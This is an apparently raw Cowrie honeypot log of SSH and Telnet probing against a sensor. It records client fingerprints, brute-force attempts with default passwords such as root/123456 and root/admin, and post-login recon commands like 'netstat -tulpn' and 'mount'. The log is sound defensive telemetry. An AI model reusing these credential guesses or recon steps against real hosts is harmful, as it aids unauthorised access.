{"eventid":"cowrie.session.closed","duration":180.06763648986816,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:05:09.965866Z","src_ip":"79.124.8.120","session":"b18e1037fcd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42098,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a9a31cf2d5b","protocol":"ssh","message":"New connection: 212.227.235.229:42098 (1.2.3.4:22) [session: 2a9a31cf2d5b]","sensor":"my-vps","timestamp":"2025-08-28T20:05:44.170049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:05:44.171176Z","src_ip":"212.227.235.229","session":"2a9a31cf2d5b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T20:05:44.378910Z","src_ip":"212.227.235.229","session":"2a9a31cf2d5b"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T20:05:45.001811Z","src_ip":"212.227.235.229","session":"2a9a31cf2d5b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:05:46.211073Z","src_ip":"212.227.235.229","session":"2a9a31cf2d5b"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":52333,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c308ebcecec","protocol":"ssh","message":"New connection: 79.127.48.196:52333 (1.2.3.4:22) [session: 8c308ebcecec]","sensor":"my-vps","timestamp":"2025-08-28T20:06:01.532445Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46738,"dst_ip":"1.2.3.4","dst_port":22,"session":"7534afa693ce","protocol":"ssh","message":"New connection: 212.227.235.229:46738 (1.2.3.4:22) [session: 7534afa693ce]","sensor":"my-vps","timestamp":"2025-08-28T20:06:05.814963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:06:05.815673Z","src_ip":"212.227.235.229","session":"7534afa693ce"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T20:06:05.914615Z","src_ip":"212.227.235.229","session":"7534afa693ce"}
{"eventid":"cowrie.login.failed","username":"webmin","password":"webmin","message":"login attempt [webmin/webmin] failed","sensor":"my-vps","timestamp":"2025-08-28T20:06:06.213929Z","src_ip":"212.227.235.229","session":"7534afa693ce"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:06:07.315643Z","src_ip":"212.227.235.229","session":"7534afa693ce"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:06:13.512285Z","src_ip":"79.127.48.196","session":"8c308ebcecec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:06:13.514414Z","src_ip":"79.127.48.196","session":"8c308ebcecec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57247,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce3cb8df858e","protocol":"telnet","message":"New connection: 212.227.125.160:57247 (1.2.3.4:23) [session: ce3cb8df858e]","sensor":"my-vps","timestamp":"2025-08-28T20:06:34.545366Z"}
{"eventid":"cowrie.session.closed","duration":13.004323482513428,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:06:47.549599Z","src_ip":"212.227.125.160","session":"ce3cb8df858e"}
{"eventid":"cowrie.login.success","username":"root","password":"112233","message":"login attempt [root/112233] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:07:05.604213Z","src_ip":"79.127.48.196","session":"8c308ebcecec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:07:37.654974Z","src_ip":"79.127.48.196","session":"8c308ebcecec"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-28T20:07:37.655699Z","src_ip":"79.127.48.196","session":"8c308ebcecec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":true,"duration":"15.5","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 15.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:07:53.189517Z","src_ip":"79.127.48.196","session":"8c308ebcecec"}
{"eventid":"cowrie.session.closed","duration":"121.4","message":"Connection lost after 121.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:08:02.898592Z","src_ip":"79.127.48.196","session":"8c308ebcecec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:08:09.566995Z","src_ip":"212.227.125.160","session":"a14aae14380d"}
{"eventid":"cowrie.session.closed","duration":180.10805439949036,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:08:09.569955Z","src_ip":"212.227.125.160","session":"a14aae14380d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35842,"dst_ip":"1.2.3.4","dst_port":22,"session":"36b65cdaf7dc","protocol":"ssh","message":"New connection: 212.227.125.160:35842 (1.2.3.4:22) [session: 36b65cdaf7dc]","sensor":"my-vps","timestamp":"2025-08-28T20:08:17.539850Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42410,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c81e6ceb356","protocol":"ssh","message":"New connection: 212.227.235.229:42410 (1.2.3.4:22) [session: 0c81e6ceb356]","sensor":"my-vps","timestamp":"2025-08-28T20:08:18.612055Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:08:18.838099Z","src_ip":"212.227.235.229","session":"0c81e6ceb356"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:08:19.316093Z","src_ip":"212.227.125.160","session":"36b65cdaf7dc"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":37268,"dst_ip":"1.2.3.4","dst_port":22,"session":"773996a83f4d","protocol":"ssh","message":"New connection: 201.148.180.50:37268 (1.2.3.4:22) [session: 773996a83f4d]","sensor":"my-vps","timestamp":"2025-08-28T20:08:27.793725Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:08:29.589933Z","src_ip":"201.148.180.50","session":"773996a83f4d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61486,"dst_ip":"1.2.3.4","dst_port":22,"session":"1706d77dae81","protocol":"ssh","message":"New connection: 217.72.205.35:61486 (1.2.3.4:22) [session: 1706d77dae81]","sensor":"my-vps","timestamp":"2025-08-28T20:08:41.297209Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:08:41.298493Z","src_ip":"217.72.205.35","session":"1706d77dae81"}
{"eventid":"cowrie.session.connect","src_ip":"43.100.42.74","src_port":46958,"dst_ip":"1.2.3.4","dst_port":23,"session":"80b564a0e91d","protocol":"telnet","message":"New connection: 43.100.42.74:46958 (1.2.3.4:23) [session: 80b564a0e91d]","sensor":"my-vps","timestamp":"2025-08-28T20:09:30.642363Z"}
{"eventid":"cowrie.session.closed","duration":30.504064798355103,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:10:01.146368Z","src_ip":"43.100.42.74","session":"80b564a0e91d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57934,"dst_ip":"1.2.3.4","dst_port":23,"session":"c59d6a677179","protocol":"telnet","message":"New connection: 212.227.125.160:57934 (1.2.3.4:23) [session: c59d6a677179]","sensor":"my-vps","timestamp":"2025-08-28T20:10:09.717541Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:10:09.802449Z","src_ip":"212.227.125.160","session":"c59d6a677179"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:10:10.264356Z","src_ip":"212.227.125.160","session":"c59d6a677179"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T20:10:10.265751Z","src_ip":"212.227.125.160","session":"c59d6a677179"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T20:10:10.266709Z","src_ip":"212.227.125.160","session":"c59d6a677179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50918,"dst_ip":"1.2.3.4","dst_port":22,"session":"d254803f2173","protocol":"ssh","message":"New connection: 212.227.125.160:50918 (1.2.3.4:22) [session: d254803f2173]","sensor":"my-vps","timestamp":"2025-08-28T20:10:28.211905Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:10:29.983454Z","src_ip":"212.227.125.160","session":"d254803f2173"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":45934,"dst_ip":"1.2.3.4","dst_port":22,"session":"61bdfeb50017","protocol":"ssh","message":"New connection: 201.148.180.50:45934 (1.2.3.4:22) [session: 61bdfeb50017]","sensor":"my-vps","timestamp":"2025-08-28T20:10:36.668107Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:10:38.453441Z","src_ip":"201.148.180.50","session":"61bdfeb50017"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":27900,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaea0ed1e517","protocol":"ssh","message":"New connection: 80.94.95.15:27900 (1.2.3.4:22) [session: aaea0ed1e517]","sensor":"my-vps","timestamp":"2025-08-28T20:10:56.376022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T20:10:56.381639Z","src_ip":"80.94.95.15","session":"aaea0ed1e517"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T20:10:56.443737Z","src_ip":"80.94.95.15","session":"aaea0ed1e517"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T20:10:56.688725Z","src_ip":"80.94.95.15","session":"aaea0ed1e517"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:10:57.742091Z","src_ip":"80.94.95.15","session":"aaea0ed1e517"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":49437,"dst_ip":"1.2.3.4","dst_port":22,"session":"b92885e943ab","protocol":"ssh","message":"New connection: 186.225.142.90:49437 (1.2.3.4:22) [session: b92885e943ab]","sensor":"my-vps","timestamp":"2025-08-28T20:11:49.168822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:11:49.223737Z","src_ip":"186.225.142.90","session":"b92885e943ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:11:49.377429Z","src_ip":"186.225.142.90","session":"b92885e943ab"}
{"eventid":"cowrie.login.success","username":"root","password":"1029384756","message":"login attempt [root/1029384756] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:11:50.268708Z","src_ip":"186.225.142.90","session":"b92885e943ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:11:50.817110Z","src_ip":"186.225.142.90","session":"b92885e943ab"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T20:11:50.817780Z","src_ip":"186.225.142.90","session":"b92885e943ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:11:51.046165Z","src_ip":"186.225.142.90","session":"b92885e943ab"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:11:51.081714Z","src_ip":"186.225.142.90","session":"b92885e943ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60909,"dst_ip":"1.2.3.4","dst_port":23,"session":"505cd1af2c03","protocol":"telnet","message":"New connection: 212.227.235.229:60909 (1.2.3.4:23) [session: 505cd1af2c03]","sensor":"my-vps","timestamp":"2025-08-28T20:12:30.160800Z"}
{"eventid":"cowrie.session.closed","duration":31.383737802505493,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:13:01.544470Z","src_ip":"212.227.235.229","session":"505cd1af2c03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:13:10.274066Z","src_ip":"212.227.125.160","session":"c59d6a677179"}
{"eventid":"cowrie.session.closed","duration":180.5608766078949,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:13:10.278337Z","src_ip":"212.227.125.160","session":"c59d6a677179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43722,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed7d4b981208","protocol":"ssh","message":"New connection: 212.227.125.160:43722 (1.2.3.4:22) [session: ed7d4b981208]","sensor":"my-vps","timestamp":"2025-08-28T20:13:43.081250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:13:44.394971Z","src_ip":"212.227.125.160","session":"ed7d4b981208"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:13:44.395659Z","src_ip":"212.227.125.160","session":"ed7d4b981208"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":39994,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec3b7808e4e3","protocol":"ssh","message":"New connection: 201.148.180.50:39994 (1.2.3.4:22) [session: ec3b7808e4e3]","sensor":"my-vps","timestamp":"2025-08-28T20:13:52.763447Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T20:13:54.083393Z","src_ip":"212.227.125.160","session":"ed7d4b981208"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T20:13:54.317944Z","src_ip":"201.148.180.50","session":"ec3b7808e4e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T20:13:54.318735Z","src_ip":"201.148.180.50","session":"ec3b7808e4e3"}
{"eventid":"cowrie.session.closed","duration":"13.6","message":"Connection lost after 13.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:13:56.633880Z","src_ip":"212.227.125.160","session":"ed7d4b981208"}
